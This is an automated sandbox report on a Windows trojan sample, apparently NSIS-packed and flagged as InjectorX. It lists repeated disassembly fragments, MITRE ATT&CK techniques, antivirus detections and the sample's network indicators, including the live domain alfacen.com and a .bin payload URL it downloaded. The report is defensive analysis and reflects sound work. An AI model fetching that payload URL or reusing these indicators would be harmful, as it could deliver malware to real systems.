    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0705E mov eax, dword ptr fs:[00000030h]4_2_36E0705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E331E1 mov eax, dword ptr fs:[00000030h]4_2_36E331E1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D1D0 mov eax, dword ptr fs:[00000030h]4_2_36D9D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D1D0 mov ecx, dword ptr fs:[00000030h]4_2_36D9D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E071F9 mov esi, dword ptr fs:[00000030h]4_2_36E071F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E351CB mov eax, dword ptr fs:[00000030h]4_2_36E351CB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D651ED mov eax, dword ptr fs:[00000030h]4_2_36D651ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB7190 mov eax, dword ptr fs:[00000030h]4_2_36DB7190
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E15180 mov eax, dword ptr fs:[00000030h]4_2_36E15180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E15180 mov eax, dword ptr fs:[00000030h]4_2_36E15180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7B1B0 mov eax, dword ptr fs:[00000030h]4_2_36D7B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67152 mov eax, dword ptr fs:[00000030h]4_2_36D67152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF9179 mov eax, dword ptr fs:[00000030h]4_2_36DF9179
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35152 mov eax, dword ptr fs:[00000030h]4_2_36E35152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E37120 mov eax, dword ptr fs:[00000030h]4_2_36E37120
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61131 mov eax, dword ptr fs:[00000030h]4_2_36D61131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61131 mov eax, dword ptr fs:[00000030h]4_2_36D61131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h]4_2_36E2BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h]4_2_36E2BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h]4_2_36E2BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h]4_2_36E2BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h]4_2_36D6BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8FEC0 mov eax, dword ptr fs:[00000030h]4_2_36D8FEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEFEC5 mov eax, dword ptr fs:[00000030h]4_2_36DEFEC5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63EF4 mov eax, dword ptr fs:[00000030h]4_2_36D63EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63EF4 mov eax, dword ptr fs:[00000030h]4_2_36D63EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63EF4 mov eax, dword ptr fs:[00000030h]4_2_36D63EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D93EEB mov ecx, dword ptr fs:[00000030h]4_2_36D93EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D93EEB mov eax, dword ptr fs:[00000030h]4_2_36D93EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D93EEB mov eax, dword ptr fs:[00000030h]4_2_36D93EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63EE1 mov eax, dword ptr fs:[00000030h]4_2_36D63EE1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E19EDF mov eax, dword ptr fs:[00000030h]4_2_36E19EDF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E19EDF mov eax, dword ptr fs:[00000030h]4_2_36E19EDF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67E96 mov eax, dword ptr fs:[00000030h]4_2_36D67E96
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEDE9B mov eax, dword ptr fs:[00000030h]4_2_36DEDE9B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]4_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DEB0 mov ecx, dword ptr fs:[00000030h]4_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]4_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]4_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]4_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1DEB0 mov eax, dword ptr fs:[00000030h]4_2_36E1DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D93E8F mov eax, dword ptr fs:[00000030h]4_2_36D93E8F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5DEA5 mov eax, dword ptr fs:[00000030h]4_2_36D5DEA5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5DEA5 mov ecx, dword ptr fs:[00000030h]4_2_36D5DEA5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEDEAA mov eax, dword ptr fs:[00000030h]4_2_36DEDEAA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5FEA0 mov eax, dword ptr fs:[00000030h]4_2_36D5FEA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BE51 mov eax, dword ptr fs:[00000030h]4_2_36D9BE51
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BE51 mov eax, dword ptr fs:[00000030h]4_2_36D9BE51
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D75E40 mov eax, dword ptr fs:[00000030h]4_2_36D75E40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1DE46 mov eax, dword ptr fs:[00000030h]4_2_36E1DE46
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5BE78 mov ecx, dword ptr fs:[00000030h]4_2_36D5BE78
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E09E56 mov ecx, dword ptr fs:[00000030h]4_2_36E09E56
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5DE10 mov eax, dword ptr fs:[00000030h]4_2_36D5DE10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BE17 mov eax, dword ptr fs:[00000030h]4_2_36D9BE17
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35E37 mov eax, dword ptr fs:[00000030h]4_2_36E35E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35E37 mov eax, dword ptr fs:[00000030h]4_2_36E35E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35E37 mov eax, dword ptr fs:[00000030h]4_2_36E35E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61E30 mov eax, dword ptr fs:[00000030h]4_2_36D61E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61E30 mov eax, dword ptr fs:[00000030h]4_2_36D61E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E33E10 mov eax, dword ptr fs:[00000030h]4_2_36E33E10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E33E10 mov eax, dword ptr fs:[00000030h]4_2_36E33E10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7DE2D mov eax, dword ptr fs:[00000030h]4_2_36D7DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7DE2D mov eax, dword ptr fs:[00000030h]4_2_36D7DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7DE2D mov eax, dword ptr fs:[00000030h]4_2_36D7DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5BFD0 mov eax, dword ptr fs:[00000030h]4_2_36D5BFD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE3FD7 mov eax, dword ptr fs:[00000030h]4_2_36DE3FD7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D91FCD mov eax, dword ptr fs:[00000030h]4_2_36D91FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D91FCD mov eax, dword ptr fs:[00000030h]4_2_36D91FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D91FCD mov eax, dword ptr fs:[00000030h]4_2_36D91FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D63FC2 mov eax, dword ptr fs:[00000030h]4_2_36D63FC2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1BFC0 mov ecx, dword ptr fs:[00000030h]4_2_36E1BFC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1BFC0 mov eax, dword ptr fs:[00000030h]4_2_36E1BFC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E33FC0 mov eax, dword ptr fs:[00000030h]4_2_36E33FC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BFEC mov eax, dword ptr fs:[00000030h]4_2_36D9BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BFEC mov eax, dword ptr fs:[00000030h]4_2_36D9BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BFEC mov eax, dword ptr fs:[00000030h]4_2_36D9BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov eax, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov eax, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov eax, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F92 mov eax, dword ptr fs:[00000030h]4_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5FF90 mov edi, dword ptr fs:[00000030h]4_2_36D5FF90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA1FB8 mov eax, dword ptr fs:[00000030h]4_2_36DA1FB8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9BFB0 mov eax, dword ptr fs:[00000030h]4_2_36D9BFB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E03F90 mov eax, dword ptr fs:[00000030h]4_2_36E03F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E03F90 mov eax, dword ptr fs:[00000030h]4_2_36E03F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping211
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Process Injection    		11
    Virtualization/Sandbox Evasion    		LSASS Memory11
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    3507071243740008011.exe32%ReversingLabsWin32.Trojan.InjectorX
    3507071243740008011.exe100%AviraHEUR/AGEN.1337946

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alfacen.com
    		193.107.36.30
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binfalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          		unknown
          http://www.ftp.ftp://ftp.gopher.3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            		unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
              		unknown
              http://nsis.sf.net/NSIS_ErrorError3507071243740008011.exe, 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000000.1654398706.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000004.00000000.2441682476.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://alfacen.com/3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727893517.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B45000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2143507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  193.107.36.30
                  		alfacen.comBulgaria
                  		201200SUPERHOSTING_ASBGfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1538168
                  Start date and time:2024-10-20 17:48:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:3507071243740008011.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@2/8@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 305
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
